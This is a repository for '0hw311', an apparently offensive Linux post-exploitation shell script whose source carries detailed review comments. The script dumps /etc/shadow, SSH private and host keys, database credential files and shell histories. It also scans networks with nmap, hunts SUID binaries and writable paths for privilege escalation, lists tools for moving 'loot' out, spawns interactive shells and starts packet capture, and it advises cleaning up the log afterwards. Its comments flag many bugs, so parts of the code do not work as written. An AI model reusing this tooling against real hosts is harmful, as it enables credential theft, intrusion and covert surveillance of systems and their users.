├── README.md
└── scrape.sh
/README.md:
--------------------------------------------------------------------------------
1 | #0hw311
2 |
3 | * A shell script for Linux post-exploitation.
4 |
5 |
6 | ( ) ( )
7 | .-. | | .-. ___ ___ ___ .--. .--. .--. | |
8 | / \ | |/ \ ( )( )( ) / \ (_ | (_ | | |
9 | | .-. ; | .-. . | | | | | | (___)`. | | | | | | |
10 | | | | | | | | | | | | | | | .-. / | | | | | |
11 | | | | | | | | | | | | | | | .. \ | | | | | |
12 | | | | | | | | | | | | | | | ___ \ . | | | | | |
13 | | . | | | | | | | | ; . | | ( ) ; | | | | | |_|
14 | . `-. / | | | | . `-. `-. . \ `-. / | | | | .-.
15 | `.__,. (___)(___) ..__...__.. .,__.. (___) (___) ( )
16 |
17 | #@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
18 |
19 | * Shell script to scrape, enumerate, or otherwise rape *nux systems,
20 | post exploitation.
21 | *
22 |
23 | * Based on g0tmi1k's excellent writeup on privilege escalation: (https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
24 | * Expanded project from bashrecon: (https://github.com/netrecon)
25 |
26 | # USAGE:
27 |
28 | ./0hw3ll
29 | -s|--scrape : Scrape the system. This will gather as much
30 | information as permissions allow. Caution:
31 | this may attract attention if you are on a
32 | pentest.
33 | -p|--pty : Try a variety of methods to upgrade to a pty
34 | terminal (if you don't already have one)
35 | -d|--dump : Attempt packet capture through tcpdump. This
36 | usually requires root/sudo. Never know, though!
37 | -h|--help : Show this help.
38 |
--------------------------------------------------------------------------------
/scrape.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | ####################################################################
3 | # Scraping *nux
4 | ####################################################################
5 | # Thanks to g0tmi1k for the excellent write-up:
6 | # https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
7 | ##################
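#######################################
# Print the banner and usage text.
# Globals:   none
# Arguments: none
# Outputs:   banner and usage on stdout; the script name comes from $0
# Returns:   0
#######################################
doHelp(){
# Two quoted here-docs replace `echo -e'...'`. In the original the closing
# quote was glued to -e, so the whole text became one argument beginning
# with "-e" and echo printed it literally (and `echo -e` is not portable
# under a #!/bin/sh shebang anyway). The quoted delimiter keeps the
# banner's backticks and backslashes literal; only the USAGE line is
# expanded, so $0 now really shows the script name instead of "$0".
cat <<'EOF'
#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# ( ) ( )
# .-. | | .-. ___ ___ ___ .--. .--. .--. | |
# / \ | |/ \ ( )( )( ) / \ (_ | (_ | | |
#| .-. ; | .-. . | | | | | | (___)`. | | | | | | |
#| | | | | | | | | | | | | | .-. / | | | | | |
#| | | | | | | | | | | | | | .. \ | | | | | |
#| | | | | | | | | | | | | | ___ \ . | | | | | |
#| . | | | | | | | | ; . | | ( ) ; | | | | | |_|
#. `-. / | | | | . `-. `-. . \ `-. / | | | | .-.
# `.__,. (___)(___) ..__...__.. .,__.. (___) (___) ( )
#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# Shell script to scrape, enumerate, or otherwise rape *nux systems.
#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
#
## Based off of g0tmi1k.s excellent writeup on priv escalation:
# https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
EOF
printf '>> USAGE: %s\n' "$0"
cat <<'EOF'
-s|--scrape : Scrape the system. This will gather as much
information as permissions allow. Caution:
this may attract attention if you are on a
pentest.
-p|--pty : Try a variety of methods to upgrade to a pty
terminal (If you don.t already have one)
-d|--dump : Attempt packet capture through tcpdump. This
usually requires root/sudo. Never know, though!
-h|--help : Show this help.
#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
EOF
}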
41 | ### Bash Recon ###
# Single append-only log file in the directory the script was launched
# from; the -s dispatcher below feeds every function through `tee -a`,
# so repeated runs accumulate in the same file.
cwd="$(pwd)"
out="${cwd}/0hw311.log"
44 | #
#######################################
# Network-side enumeration: interface names, local and public IPv4
# addresses, a quick nmap of each attached subnet and of the public
# address, then whatever network/firewall/DNS configuration is readable.
# Globals:   RIGHT_NOW, pubIP, INTFACES, intIPS, intSNS, sn_RESULTS,
#            pi_RESULTS are all assigned at global scope (no `local`)
# Arguments: none
# Outputs:   stdout (the -s dispatcher pipes this into tee)
# Returns:   status of the last command; the `exit 1` below ends the
#            whole script when the function is not run in a pipeline
#######################################
bashrecon(){
# Computed but never printed or otherwise used in this function.
RIGHT_NOW=$(date +"%x %r %Z")
# Outbound HTTP request to a third-party service; it shows up in
# egress/proxy logs. The trailing `echo` only appends a newline.
pubIP=$(curl ipecho.net/plain;echo)
########################
# Interface names: cut each line at the first blank/tab, drop `lo` and
# empty lines. Hardcoded /sbin/ifconfig (net-tools) is absent on hosts
# that only ship iproute2.
INTFACES=$(/sbin/ifconfig -a | sed 's/[ \t].*//;/^\(lo\|\)$/d')
# One IPv4 address per interface, parsed from the legacy
# "inet addr:A.B.C.D Bcast:... Mask:..." line. NOTE(review): newer
# net-tools prints "inet A.B.C.D netmask ..." with no "Mask", so this
# is expected to yield nothing there — confirm on current distros.
intIPS=$(for i in ${INTFACES}; do /sbin/ifconfig $i | grep Mask | cut -d ':' -f2 | cut -d " " -f1; done)
# First three octets plus ".*": every address is treated as a /24
# regardless of the real netmask.
intSNS=$(for i in ${intIPS}; do echo $i | cut -d "." -f -3 | sed 's/$/.*/'; done)
# Active service scan of each assumed /24 and of the public address.
# Both are loud on the wire (IDS / flow logs); nmap may not be installed.
sn_RESULTS=$(for i in ${intSNS}; do nmap -sV -F $i; done)
pi_RESULTS=$(nmap -sV -F ${pubIP})
########################
# Unquoted expansion: word splitting flattens nmap's multi-line report
# onto a single line.
echo ${sn_RESULTS}
echo ${pi_RESULTS}

cat /etc/network/interfaces
cat /etc/sysconfig/network
cat /etc/resolv.conf
cat /etc/sysconfig/network # duplicate of the line two above
cat /etc/networks

# BUG: this compares the literal string "whoami" with "root" (no command
# substitution), so the test is always false and `iptables -L` is
# unreachable. `[[ ]]` is also a bashism under the #!/bin/sh shebang.
if [[ whoami == "root" ]];
then
iptables -L || echo 'We are not root'
else
# `2>&!` is not a valid redirection (presumably `2>&1` was meant); the
# shell rejects or misparses it. If sudo requires a password this line
# can block on the prompt, and on failure `exit 1` terminates the whole
# script unless bashrecon is running inside a pipeline subshell.
sudo iptables -V >/dev/null 2>&! || { echo 'We got no sudo' && exit 1 ;}
fi

arp -e
route -n
/sbin/route -nee
hostname
dnsdomainname
}
77 | #
78 |
#######################################
# Host enumeration: OS and kernel, shell environment, processes,
# installed packages, service configuration, credential-bearing files,
# users and sudo rights, home directories, shell histories, writable
# paths under /etc, /var data, web roots, logs, sockets and mounts.
# Every command runs unconditionally; unreadable paths just print an
# error on stderr (most of the shadow/key/log reads need root).
# Globals:   none
# Arguments: none ($1 is referenced once below but is always empty here)
# Outputs:   stdout (the -s dispatcher pipes this into tee)
# Returns:   status of the last command (`cat /etc/fstab`)
#######################################
getEnv(){

#system
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release # Debian based
cat /etc/redhat-release # Redhat based
# kernel
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux # may be refused for non-root when dmesg is restricted
ls /boot | grep vmlinuz-
#env
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
# find printers
lpstat -a
# get running services
ps aux
ps -ef
ps aux | grep root
ps -ef | grep root
cat /etc/services
# installed programs
ls -alh /usr/bin/
ls -alh /sbin/
# The fallback messages fire on any non-zero exit, not only "not installed".
dpkg -l || echo 'Not a debian sys..'
rpm -qa || echo 'Not a rhel sys either...'
ls -alh /var/cache/apt/archives*
ls -alh /var/cache/yum/

# find misconfigured services

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
# BROKEN: inside double quotes `$1` is expanded by the outer shell (the
# function's own first argument, i.e. empty), and the awk pattern
# `/^.*r.*` is never closed, so the inner sh gets an unterminated quote
# and reports a syntax error instead of listing readable /etc entries.
sh -c "ls -aRl /etc/ | awk '$1 ~ /^.*r.*"

#grep -i user [filename]
#grep -i pass [filename]
#grep -C 5 "password" [filename]
# BUG: `$password` is expanded by the shell (unset -> empty), so grep
# searches for "var " rather than the literal "var $password". The find
# starts at the current directory, i.e. wherever the log is being written.
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
cat /etc/passwd
cat /etc/group
# Credential material starts here: /etc/shadow, user SSH keys and the
# host keys. Reading them needs root (or broken permissions); on hosts
# with file-access auditing each of these reads is logged.
cat /etc/shadow
ls -alh /var/mail/
ls -la ~/.ssh/
cat ~/.ssh/config
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa*.pub
cat ~/.ssh/id_rsa* # also matches the .pub files already printed above
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

id
id -u
groups
who
w
last
# BUG: `cut -d:` without a field list (-f) is rejected by cut, so this
# prints a usage error and no user list.
cat /etc/passwd | cut -d: # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l # may block on a password prompt when sudo requires one

# what do we got @home?

ls -ahlR /root/
ls -ahlR /home/
# Recursive listing of the entire filesystem: very slow and by far the
# largest contributor to the log file.
ls -ahlR /

# enum hist

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
# and env
cat ~/.bashrc # already printed in the env section above
cat ~/.profile
head -n 100 /var/mail/root
head -n 100 /var/spool/mail/root

# what can we mess with?

# The awk patterns test the ls mode string: any `w` (owner, group or
# other), owner-write (3rd char), group-write (6th char), other-write
# (9th char). Note the `2>/dev/null` is on awk, not ls, so the
# permission-denied errors from the recursive ls are still printed.
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other

# `-readable` means readable by the calling user, not by "anyone".
find /etc/ -readable -type f 2>/dev/null # Anyone
# `-maxdepth` after the tests draws a "global option after argument"
# warning from GNU find (swallowed by the redirect); it still applies.
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone

# variable data please?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

# databases

ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/ # subtree of the /var/www listing above

# enum logs

cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
# wtmp, utmp, lastlog and faillog are binary records; `last`, `who`
# and `w` above already render them readably.
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

lsof -i
lsof -i :80
grep 80 /etc/services # matches any line containing "80" (8080, 1080, ...)
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list # SysV init only
chkconfig --list | grep 3:on
last # repeated from the users section above
w
mount
df -h
cat /etc/fstab

}
273 |
274 |
#######################################
# List scheduled-task configuration: the caller's crontab, the cron
# spool, the system cron*/at allow-deny files and root's crontab.
# Globals:   none
# Arguments: none
# Outputs:   stdout; unreadable paths report on stderr (the spool
#            paths normally need root)
# Returns:   status of the last cat
#######################################
getCrons(){
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
# One cat per path so an unreadable file does not hide the others; the
# glob is deliberately unquoted so it keeps expanding to every /etc/cron*.
for f in /etc/cron* /etc/at.allow /etc/at.deny /etc/cron.allow /etc/cron.deny /etc/crontab /etc/anacrontab /var/spool/cron/crontabs/root; do
  cat "$f"
done
}
290 |
#######################################
# Filesystem permission sweep: sticky/SGID/SUID entries, writable and
# executable directories, unowned files, installed interpreters and
# compilers, and which file-transfer clients are on PATH.
# Globals:   fpath (assigned here, global scope)
# Arguments: none
# Outputs:   stdout (the -s dispatcher pipes this into tee)
# Returns:   status of the last command
#######################################
getSUID(){
# setu/g/id mmmk?
# Search root: "/" normally, or "/" minus /home when an ecryptfs home
# mount is present. BUG: the inner double quotes end the string early,
# so fpath becomes `/ -not -path /home/*`; when `$fpath` is later
# expanded unquoted the shell globs `/home/*`, and with more than one
# entry in /home the extra paths land after the expression and find
# rejects the command ("paths must precede expression").
if [ ! -d /home/.ecryptfs ]
then
fpath="/"
else
fpath="/ -not -path "/home/*""
fi
find $fpath -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find $fpath -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find $fpath -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.

# `-o` binds looser than the implicit `-a`, so `-type f` applies only
# to the SUID arm; SGID directories are listed as well.
find $fpath -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
# Relies on the locate database being present and current.
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
# Same precedence issue: `! -type l -maxdepth 3 -exec ...` attaches to
# the `-perm -4000` arm only, so SGID matches get the default -print
# and are not depth-limited. `-maxdepth` after the tests also triggers
# find's "global option" warning (hidden by the redirect).
find $fpath -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
# what can we write to?

# `-writable` is "writable by the calling user", not world-writable.
find $fpath -writable -type d 2>/dev/null # world-writeable folders
# `-perm -222` requires the write bit for owner, group AND other.
find $fpath -perm -222 -type d 2>/dev/null # world-writeable folders
# BROKEN: `-perm -o w` hands find `-o` as the mode argument, which it
# rejects as invalid (symbolic modes need an operator, e.g. `o=w`), and
# the `2>/dev/null` hides the error, so this line and the two `-o x` /
# combined lines below silently print nothing.
find $fpath -perm -o w -type d 2>/dev/null # world-writeable folders

find $fpath -perm -o x -type d 2>/dev/null # world-executable folders

find $fpath \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders


# anything weird already happening here?

# `-type d`: this lists world-writable directories without the sticky
# bit, not files as the trailing comment says.
find $fpath -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files
# Literal `/dir` is a leftover placeholder path, not `$fpath`, so this
# only reports "No such file or directory".
find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files


# what dev tools we got to exploit?

# Unquoted `-name perl*` etc. are expanded by the shell first when a
# matching file exists in the current directory; no stderr redirect
# here, so permission-denied noise is printed for each full-tree walk.
find $fpath -name perl*
find $fpath -name python*
find $fpath -name gcc*
find $fpath -name g++*
find $fpath -name cc




# how can we transfer loot?
# Each fallback is another full-filesystem find without a stderr redirect.
which wget || find $fpath -name wget
which curl || find $fpath -name curl
which nc || find $fpath -name nc*
which netcat || find $fpath -name netcat*
which tftp || find $fpath -name tftp*
which ftp || find $fpath -name ftp
which ncat || find $fpath -name ncat*
which telnet || find $fpath -name telnet*
# Self-test of `echo -e` support: under dash (#!/bin/sh) the "-en" is
# printed literally along with the backslash sequences.
echo -en "\nIf you can see a new line here: \n;than this does not have echo -e\n"
which base64 || echo 'Wtf no base64'
}
348 |
#######################################
# Try a chain of interactive-shell launchers and report which one ran.
# The nesting below is "try the next one only if the previous command
# exited non-zero"; the `else` at the bottom belongs to the outermost
# `if`, so 'Exited pty...' is printed when `/bin/sh -i` itself exits 0.
# Globals:   none
# Arguments: none
# Outputs:   progress messages on stdout; any spawned shell is interactive
# Returns:   status of the last command
#######################################
spawnPty(){

echo 'Trying to spawn a tty...'
if ! /bin/sh -i;then
if ! python -c 'import pty;pty.spawn("/bin/bash")';then
#if ! echo os.system('/bin/bash');then
# BUG: `—e` is an em dash (U+2014), not `-e`, so perl tries to open a
# script file with that name and fails.
if ! perl —e 'exec "/bin/sh";';then
# The next two lines are not shell syntax: `perl:` and `ruby:` are
# looked up as command names (not found -> status 127), so both
# conditions are always true and fall through to the empty echo.
if ! perl: exec "/bin/sh";then
if ! ruby: exec "/bin/sh";then
#if ! lua: os.execute('/bin/sh');then
echo ""
fi
fi
fi
fi
#fi
#fi
#fi
# Reached whenever `/bin/sh -i` failed, regardless of whether the python
# attempt above succeeded — expect is tried even after a working pty.
echo 'Crap. One options left. Checking for expect...'
if ! expect -c 'spawn sh;interact';then
echo "Sorry, could not get a pty!"
fi

else

echo 'Exited pty...'
fi

}
378 |
#######################################
# Start a background tcpdump per non-loopback interface, meant to log
# into $cwd/sniff.<iface>.log (needs root / CAP_NET_RAW).
# Globals:   cwd (read; set at file scope)
# Arguments: none
# Outputs:   intended: one log file per interface; actual: see below
# Returns:   0 (the last command is a redirection-only no-op)
#######################################
trySniff(){
# BUGS: (1) the command substitution is double-quoted, so the loop runs
# once with every interface name in $i joined by newlines, and the
# unquoted `$i` then word-splits into `tcpdump -i eth0 eth1 ...` where
# the extra names are parsed as a capture filter; (2) `&` ends the
# tcpdump command before the redirection, so tcpdump writes to the
# terminal while `> "$cwd/sniff.$i.log" 2>&1` only creates an empty
# file (with the newline-joined names in its name); (3) the background
# job is never waited for, so it keeps running after the script exits.
for i in "$(/sbin/ifconfig -a | sed 's/[ \t].*//;/^\(lo\|\)$/d')";do tcpdump -i $i & > "$cwd/sniff.$i.log" 2>&1;done
}
382 |
# Dispatcher. There is no `*)` arm, so an unknown or missing option does
# nothing and the final bare `exit` returns 0.
case $1 in

-s|--scrape)
echo 'Scraping the system... After this is done (if it ever finishes), try running with --pty or --sniff ...'
# `scrapeIt` is not defined anywhere in this file, so this line prints
# "command not found" on stderr and logs nothing.
# Redirections: in bash `&>2` sends tee's stdout and stderr to a file
# literally named "2" in the current directory, then `>> /dev/null`
# re-points stdout, leaving tee's -a file as the only copy. Under dash
# (the #!/bin/sh shebang) `&` instead backgrounds the pipeline and
# `>2 >> /dev/null` is a separate no-op that still creates "2". Either
# way a stray "2" file appears next to the log, and under dash the
# "Done!" message prints before the functions have finished.
scrapeIt | tee -a $out &>2 >> /dev/null
bashrecon | tee -a $out &>2 >> /dev/null
getEnv | tee -a $out &>2 >> /dev/null
getCrons | tee -a $out &>2 >> /dev/null
getSUID | tee -a $out &>2 >> /dev/null
echo 'Done! Make sure you clean up the log!'
;;

# Help text advertises `-p` (lowercase); only `-P` and the long forms
# match here, so `-p` falls through to the missing default arm.
-P|--pty|--spawn-pty|--spawnpty|--getpty|--get-pty)
# `tty` prints "not a tty" when stdin is not a terminal, so this test
# is inverted relative to the messages: spawnPty runs when a terminal
# is already attached, and "already in a pty" is shown when there is
# none. The -f/--force option mentioned below is not implemented
# (see the commented-out block).
if [ "`tty`" != "not a tty" ]
then
spawnPty
else
echo 'You are already in a pty! Use -f/--force to do it anyway.'
fi
;;

#case $2 in
#-f | --force)
#echo 'Sure, why not? Attempting to spawn anyway because of --force...'
# Help text and the -s message advertise `--dump`; only `-d`, `-dump`,
# bare `tcpdump` and `--sniff` are accepted here.
-d|-dump|tcpdump|--sniff)
trySniff
;;


-h|--help)
doHelp
;;

esac

# No status given: exits with the status of the last command executed.
exit
419 |
--------------------------------------------------------------------------------